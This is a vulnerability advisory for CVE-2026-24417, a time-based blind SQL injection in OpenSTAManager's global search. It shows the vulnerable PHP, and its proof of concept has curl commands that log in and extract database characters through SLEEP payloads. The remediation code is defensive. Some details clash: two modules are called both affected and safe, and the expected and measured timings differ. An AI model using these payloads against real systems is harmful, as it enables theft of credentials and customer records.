CVE-2026-24417
Summary
Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.
Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: term (GET)
Affected Endpoint: /ajax_search.php
Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi
Details
OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Vulnerability Chain:
- Entry Point: /ajax_search.php (lines 30-31)
```php
$term = get('term');
$term = str_replace('/', '\/', $term);
```
The $term parameter undergoes minimal sanitization (only forward-slash replacement).
- Distribution: /src/AJAX.php::search() (lines 159-161)
```php
// Collect every module's ajax/search.php, plus the global handler, and run the
// same (unsanitized) $term through each of them.
$files = self::find('ajax/search.php');
array_unshift($files, base_dir().'/ajax_search.php');
foreach ($files as $file) {
    $module_results = self::getSearchResults($file, $term);
}
The unsanitized $term is passed to all module-specific search handlers.
- Execution: /src/AJAX.php::getSearchResults() (line 373)
```php
require $file;
```
Each module's search.php file is included with $term variable in scope.
- Vulnerable SQL Queries: multiple modules directly concatenate $term without prepare().
All Affected Files (10+ vulnerable instances):
/modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)
```php
// $value is a column name, $term is the raw GET parameter: the user input lands
// inside the LIKE string literal without escaping or binding.
foreach ($fields as $name => $value) {
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
}
$rs = $dbo->fetchArray($query);
```
Impact: direct concatenation without prepare() allows full SQL injection.
/modules/ordini/ajax/search.php - Lines 43, 47
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
$query .= '... WHERE mg_articoli.codice LIKE "%'.$term.'%" OR mg_articoli_lang.title LIKE "%'.$term.'%"';
```
/modules/ddt/ajax/search.php - Lines 43, 47
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/fatture/ajax/search.php - Lines 45, 49
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/preventivi/ajax/search.php - Lines 45, 49
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/impianti/ajax/search.php - Line 46
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
Properly Sanitized (NOT vulnerable):
/modules/contratti/ajax/search.php - uses prepare() correctly
/modules/automezzi/ajax/search.php - uses prepare() correctly
Note: The vulnerability has amplified execution: a single malicious request triggers the SQL injection in ALL vulnerable modules at once, so a time-based payload executes 10+ times per request. The delays add up, which produced the 504 Gateway Time-out errors observed on the live demo instance.
PoC
Step 1: Login
```bash
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'
```
Step 2: Verify Vulnerability (Time-Based SLEEP)
```bash
# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s
```
Step 3: Data Extraction - Database Name
```bash
# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s
```
Impact
Affected Users: All authenticated users with access to the global search functionality.
- Complete database exfiltration including customer PII, financial records, business secrets
- Extraction of password hashes for offline cracking
- Amplified time-based attacks consume 85x server resources per request
Recommended Fix:
Replace all instances of direct $term concatenation with prepare():
BEFORE (Vulnerable):
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
AFTER (Fixed):
```php
$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');
```
Apply this fix to ALL affected files:
- /modules/articoli/ajax/search.php - Line 51
- /modules/ordini/ajax/search.php - Lines 43, 47, 79
- /modules/ddt/ajax/search.php - Lines 43, 47, 83
- /modules/fatture/ajax/search.php - Lines 45, 49, 85
- /modules/preventivi/ajax/search.php - Lines 45, 49, 83
- /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
- /modules/impianti/ajax/search.php - Line 46
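The following is an added illustration, not OpenSTAManager code: it places the concatenating query builder from the Details section beside a hardened builder that uses PDO bound parameters instead of the project's prepare() helper, whitelists the column names, and escapes LIKE wildcards in the term (something quoting alone does not do). The table name, column whitelist and `$pdo` connection are assumptions.

```php
<?php
// Added example, not OpenSTAManager code. Table and column names are constructed.

// VULNERABLE: the raw $term lands inside the LIKE string literal. A term that
// closes the double quote can append arbitrary SQL expressions.
function buildSearchQueryVulnerable(array $fields, string $term): string
{
    $query = 'SELECT id FROM mg_articoli WHERE 1=0';
    foreach ($fields as $column) {
        $query .= ' OR '.$column.' LIKE "%'.$term.'%"';
    }
    return $query;
}

// HARDENED: column names come from a fixed whitelist (they cannot be bound),
// the term is passed as a bound parameter, and '%' / '_' are escaped so user
// input cannot turn into a wildcard scan of the whole table.
const SEARCHABLE_COLUMNS = ['codice', 'descrizione']; // constructed whitelist

function escapeLikeWildcards(string $term): string
{
    // Backslash first, then the two LIKE metacharacters. MySQL's default LIKE
    // escape character is the backslash, so no ESCAPE clause is needed.
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $term);
}

function buildSearchQueryHardened(array $fields, string $term): array
{
    $conditions = [];
    $params = [];
    foreach (array_values($fields) as $i => $column) {
        if (!in_array($column, SEARCHABLE_COLUMNS, true)) {
            throw new InvalidArgumentException('Column not searchable: '.$column);
        }
        $conditions[] = $column.' LIKE :term'.$i;
        $params[':term'.$i] = '%'.escapeLikeWildcards($term).'%';
    }
    if ($conditions === []) {
        return ['SELECT id FROM mg_articoli WHERE 1=0', []];
    }
    $sql = 'SELECT id FROM mg_articoli WHERE '.implode(' OR ', $conditions);
    return [$sql, $params];
}

// Usage against an existing PDO connection ($pdo is assumed to exist):
// [$sql, $params] = buildSearchQueryHardened(SEARCHABLE_COLUMNS, $_GET['term'] ?? '');
// $stmt = $pdo->prepare($sql);
// $stmt->execute($params);
// $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
```

With the hardened builder the term `" AND 0 OR SLEEP(1) OR "` from the PoC is matched as a literal substring, so the query time no longer depends on its content.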
References
- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h
- https://nvd.nist.gov/vuln/detail/CVE-2026-24417
- https://github.com/devcode-it/openstamanager
